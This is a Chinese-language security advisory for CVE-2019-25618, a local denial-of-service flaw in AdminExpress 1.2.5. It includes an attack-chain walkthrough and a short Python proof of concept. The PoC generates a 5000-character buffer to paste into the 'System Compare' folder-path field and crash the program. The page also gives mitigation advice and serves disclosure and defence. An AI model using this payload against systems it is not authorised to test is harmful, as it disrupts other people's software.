CVE-2019-25618 CVSS 6.2 中危

CVE-2019-25618 AdminExpress拒绝服务漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25618

漏洞类型

拒绝服务

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AdminExpress

漏洞概述

AdminExpress 1.2.5版本中存在一个严重的拒绝服务漏洞。该漏洞允许本地攻击者通过“系统比较”功能提交超长输入来导致应用程序崩溃。具体而言，攻击者可以将包含大量字符的缓冲区粘贴到“文件夹路径”输入字段中，并触发系统比较功能。由于程序未对输入长度进行有效验证，处理该异常输入时将导致应用程序变得无响应或完全终止，从而破坏服务的可用性。

技术细节

该漏洞的根本原因在于AdminExpress应用程序在处理用户输入时缺乏必要的边界检查。在“系统比较”功能模块中，用于存储文件夹路径的缓冲区大小是固定的。当攻击者通过本地接口输入一段超长字符串（例如数千字节的字符）并粘贴到路径字段时，应用程序在尝试读取和处理该数据时会发生缓冲区溢出或内存访问越界。由于CVSS向量为AV:L（本地攻击），攻击者需要具备对目标机器的本地访问权限。然而，利用该漏洞无需用户交互（UI:N）且无需特权（PR:N），一旦恶意数据被提交并触发比较逻辑，底层异常将导致主进程崩溃，造成拒绝服务。

攻击链分析

STEP 1

侦察

攻击者确认目标系统上安装了AdminExpress 1.2.5版本。

STEP 2

武器化

攻击者准备一段包含大量重复字符的字符串（如5000个'A'）作为攻击载荷。

STEP 3

交付

攻击者在本地打开AdminExpress应用程序，进入“系统比较”功能界面，并将超长字符串粘贴到“文件夹路径”输入框中。

STEP 4

利用

攻击者触发系统比较功能，应用程序尝试处理超长路径数据。

STEP 5

影响

由于缓冲区处理不当，应用程序发生崩溃或停止响应，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2019-25618 (AdminExpress Denial of Service)
# This script generates a malicious payload to crash the application.

def generate_dos_payload(length=5000):
    """
    Generates a large string buffer to trigger the crash.
    """
    return "A" * length

if __name__ == "__main__":
    # Generate a payload of 5000 characters
    crash_payload = generate_dos_payload(5000)
    
    print("[+] Payload generated successfully.")
    print(f"[+] Payload length: {len(crash_payload)} characters")
    print("\n[!] Manual Steps to Reproduce:")
    print("1. Launch AdminExpress 1.2.5")
    print("2. Navigate to the 'System Compare' feature")
    print("3. Copy the payload generated below.")
    print("4. Paste the payload into the 'Folder Path' field.")
    print("5. Click the 'Compare' or trigger the function.")
    print("6. Application will become unresponsive or crash.")
    
    # For demonstration purposes, printing first 100 chars
    print(f"\nPayload preview: {crash_payload[:100]}...")

影响范围

AdminExpress 1.2.5

防御指南

临时缓解措施

在未获得官方补丁之前，建议用户谨慎使用AdminExpress的“系统比较”功能，避免在路径字段中输入或粘贴未知来源的长字符串。对于关键的运维环境，建议暂时卸载受影响版本或使用替代工具，直到漏洞被修复。同时，应限制对运行该应用程序的操作台的物理访问和逻辑访问权限，防止潜在的本地攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表